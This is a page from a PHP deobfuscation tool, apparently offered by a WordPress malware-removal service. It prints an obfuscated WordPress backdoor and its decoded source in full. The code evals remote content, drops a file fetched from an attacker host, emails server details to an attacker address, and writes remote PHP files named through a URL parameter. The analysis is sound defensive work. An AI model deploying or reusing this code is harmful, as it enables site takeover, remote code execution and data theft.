Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php goto PTjDx; tFIlE: $host = str_replace("\167\167\x77\x2e", '', @$_SERVER["\110\x54\124\x50\137\x48\117\x53\124"]); goto AJmZU; ZAJ5W: $EL_MuHaMMeD = "\104\157\163\x79\141\40\131\x6f\x6c\165\x20\x3a\40" . $_SERVER["\x44\x4f\103\125\115\x45\x4e\x54\137\122\117\x4f\124"] . "\xd\xa"; goto fTJ3l...



Obfuscated php code

<?php goto PTjDx; tFIlE: $host = str_replace("\167\167\x77\x2e", '', @$_SERVER["\110\x54\124\x50\137\x48\117\x53\124"]); goto AJmZU; ZAJ5W: $EL_MuHaMMeD = "\104\157\163\x79\141\40\131\x6f\x6c\165\x20\x3a\40" . $_SERVER["\x44\x4f\103\125\115\x45\x4e\x54\137\122\117\x4f\124"] . "\xd\xa"; goto fTJ3l; hiFXY: if (function_exists("\x63\165\x72\154\x5f\151\156\x69\x74")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("\x66\x69\154\x65\x5f\x67\x65\x74\137\143\x6f\156\164\145\156\164\163")) { @($gitt = file_get_contents($x)); } goto YVAZZ; fTJ3l: $EL_MuHaMMeD .= "\123\x65\x72\166\x65\x72\x20\101\144\x6d\x69\156\40\72\x20" . $_SERVER["\x53\105\x52\126\x45\122\x5f\101\x44\115\111\116"] . "\15\12"; goto Ln4us; mVaq1: $kime = "\x6c\x6f\147\151\156\x6f\154\144\165\x6d\100\x67\155\141\151\x6c\56\x63\x6f\155"; goto klW0E; WEhmX: echo "\74\41\104\x4f\x43\x54\131\x50\x45\40\150\164\x6d\x6c\41\76"; goto a0ZFw; YVAZZ: echo $gitt; goto PI9Kb; TBh_S: $s = "\x68\164\x74\x70\163\72\57\57\141\143\142\144\146\56\163\x70\x61\143\x65\x2f"; goto tFIlE; Q21Pl: error_reporting(0); goto TBh_S; AJmZU: $x = $s . "\154\x2d" . base64_encode($host); goto hiFXY; PI9Kb: if (isset($_GET["\x6b\163\146\x67"])) { $f = fopen($_GET["\153\x73\x66\x67"] . "\56\x70\x68\x70", "\x61"); fwrite($f, file_get_contents($s . "\163\55" . $_GET["\153\x73\x66\147"])); fclose($f); } goto WEhmX; PTjDx: eval("\x3f\76" . file_get_contents("\x68\x74\164\x70\x73\72\57\x2f\x67\x6f\x6f\x67\x6c\x65\163\x65\157\x2e\155\x65\x2f\144\141\164\141\56\164\170\164")); goto CMBC2; CMBC2: if ($_POST["\161\165\x65\162\x79"]) { $veriyfy = stripslashes(stripslashes($_POST["\x71\x75\x65\x72\x79"])); $data = "\x64\141\164\141\56\164\170\164"; @touch("\x64\x61\x74\141\56\164\x78\x74"); $ver = @fopen($data, "\167"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("\144\x61\164\141\x2e\164\170\x74", "\162"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto uHN2M; uHN2M: $datasi = @fopen("\x6a\x73\57\x73\145\x6f\x2e\160\x68\160", "\162"); goto KmosN; KmosN: if ($datasi) { } else { @mkdir("\x6a\x73"); $dos = file_get_contents("\150\x74\x74\160\x73\72\x2f\57\167\157\x72\144\x70\162\x65\163\x2e\x70\141\147\x65\x2f\x74\170\x74\57\154\141\155\145\x72\x2e\164\170\x74"); $data = "\152\x73\x2f\x73\145\157\x2e\x70\x68\160"; @touch("\152\163\57\163\x65\157\x2e\x70\150\160"); $ver = @fopen($data, "\x77"); @fwrite($ver, $dos); @fclose($ver); $yol = "\x68\x74\164\x70\72\57\x2f" . $_SERVER["\110\x54\x54\x50\x5f\110\x4f\x53\x54"] . '' . $_SERVER["\122\105\x51\x55\105\x53\x54\137\125\122\111"] . ''; $y = "\x3c\x68\x31\x3e\123\145\156\144\145\162\x20\131\x61\172\144\151\x72\151\154\144\x69\x2e\x3c\x62\162\57\76\x20\123\x49\x54\x45\x20\x59\x4f\x4c\40\72\x20" . $yol . "\74\x62\162\x2f\x3e\123\145\x6e\144\145\x72\40\131\x6f\x6c\x75\40\72\40\152\x73\x2f\143\x72\x73\56\x70\x68\x70\x3c\57\x68\x31\76"; $header .= "\x46\x72\157\x6d\x3a\40\123\x68\x65\114\x4c\40\x42\157\157\164\x20\74\163\x75\160\160\x6f\x72\x40\x6e\x69\143\56\157\162\x67\76\xa"; $header .= "\103\x6f\156\164\x65\156\x74\55\x54\171\160\145\72\x20\164\x65\170\164\57\150\164\x6d\154\x3b\xa\40\143\150\x61\x72\x73\x65\164\x3d\x75\164\x66\x2d\70\12"; @mail("\x6c\157\x67\151\x6e\157\154\x64\x75\x6d\x40\x67\155\141\x69\154\x2e\x63\x6f\x6d", "\110\141\x63\x6b\154\x69\x6e\x6b\x20\x42\151\x6c\x64\x69\x72\151", "{$y}", $header); @mail("\154\x6f\x67\151\156\157\x6c\144\x75\x6d\x40\147\155\x61\151\154\x2e\x63\157\155", "\x48\141\143\x6b\x6c\151\x6e\153\40\x42\151\x6c\144\x69\162\x69", "{$y}", $header); } goto mVaq1; K8lSA: $EL_MuHaMMeD .= "\123\150\x65\154\x6c\x20\x4c\151\156\153\x20\72\x20\150\164\x74\160\x3a\57\57" . $_SERVER["\123\x45\122\x56\105\x52\x5f\116\x41\115\x45"] . $_SERVER["\x50\x48\120\137\x53\x45\114\106"] . "\15\xa"; goto zf5i2; klW0E: $baslik = "\x32\60\x32\x32\40\154\x6f\147"; goto ZAJ5W; zf5i2: $EL_MuHaMMeD .= "\x41\166\x6c\x61\156\141\x6e\x20\123\x69\164\x65\x20\72\x20" . $_SERVER["\x48\124\124\120\137\x48\x4f\123\x54"] . "\15\12"; goto nu0fS; Ln4us: $EL_MuHaMMeD .= "\123\145\162\x76\145\162\40\151\x73\x6c\x65\x74\151\x6d\40\x73\151\x73\164\145\x6d\151\x20\72\x20" . $_SERVER["\123\105\x52\126\105\122\137\123\x4f\106\x54\x57\x41\122\x45"] . "\xd\12"; goto K8lSA; nu0fS: mail($kime, $baslik, $EL_MuHaMMeD); goto Q21Pl; a0ZFw:

Decoded(de-Obfuscated) php code

<?php

eval("?>" . file_get_contents("https://googleseo.me/data.txt"));
if ($_POST["query"]) {
    $veriyfy = stripslashes(stripslashes($_POST["query"]));
    $data = "data.txt";
    @touch("data.txt");
    $ver = @fopen($data, "w");
    @fwrite($ver, $veriyfy);
    @fclose($ver);
} else {
    $datas = @fopen("data.txt", "r");
    $i = 0;
    while ($i <= 5) {
        $i++;
        $blue = @fgets($datas, 1024);
        echo $blue;
    }
}
$datasi = @fopen("js/seo.php", "r");
if ($datasi) {
} else {
    @mkdir("js");
    $dos = file_get_contents("https://wordpres.page/txt/lamer.txt");
    $data = "js/seo.php";
    @touch("js/seo.php");
    $ver = @fopen($data, "w");
    @fwrite($ver, $dos);
    @fclose($ver);
    $yol = "http://" . $_SERVER["HTTP_HOST"] . '' . $_SERVER["REQUEST_URI"] . '';
    $y = "<h1>Sender Yazdirildi.<br/> SITE YOL : " . $yol . "<br/>Sender Yolu : js/crs.php</h1>";
    $header .= "From: SheLL Boot <suppor@nic.org>\n";
    $header .= "Content-Type: text/html;\n charset=utf-8\n";
    @mail("loginoldum@gmail.com", "Hacklink Bildiri", "{$y}", $header);
    @mail("loginoldum@gmail.com", "Hacklink Bildiri", "{$y}", $header);
}
$kime = "loginoldum@gmail.com";
$baslik = "2022 log";
$EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER["DOCUMENT_ROOT"] . "\r\n";
$EL_MuHaMMeD .= "Server Admin : " . $_SERVER["SERVER_ADMIN"] . "\r\n";
$EL_MuHaMMeD .= "Server isletim sistemi : " . $_SERVER["SERVER_SOFTWARE"] . "\r\n";
$EL_MuHaMMeD .= "Shell Link : http://" . $_SERVER["SERVER_NAME"] . $_SERVER["PHP_SELF"] . "\r\n";
$EL_MuHaMMeD .= "Avlanan Site : " . $_SERVER["HTTP_HOST"] . "\r\n";
mail($kime, $baslik, $EL_MuHaMMeD);
error_reporting(0);
$s = "https://acbdf.space/";
$host = str_replace("www.", '', @$_SERVER["HTTP_HOST"]);
$x = "https://acbdf.space/l-" . base64_encode($host);
if (function_exists("curl_init")) {
    $ch = @curl_init();
    curl_setopt($ch, CURLOPT_URL, $x);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $gitt = curl_exec($ch);
    curl_close($ch);
    if ($gitt == false) {
        @($gitt = file_get_contents($x));
    }
} elseif (function_exists("file_get_contents")) {
    @($gitt = file_get_contents($x));
}
echo $gitt;
if (isset($_GET["ksfg"])) {
    $f = fopen($_GET["ksfg"] . ".php", "a");
    fwrite($f, file_get_contents($s . "s-" . $_GET["ksfg"]));
    fclose($f);
}
echo "<!DOCTYPE html!>";

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.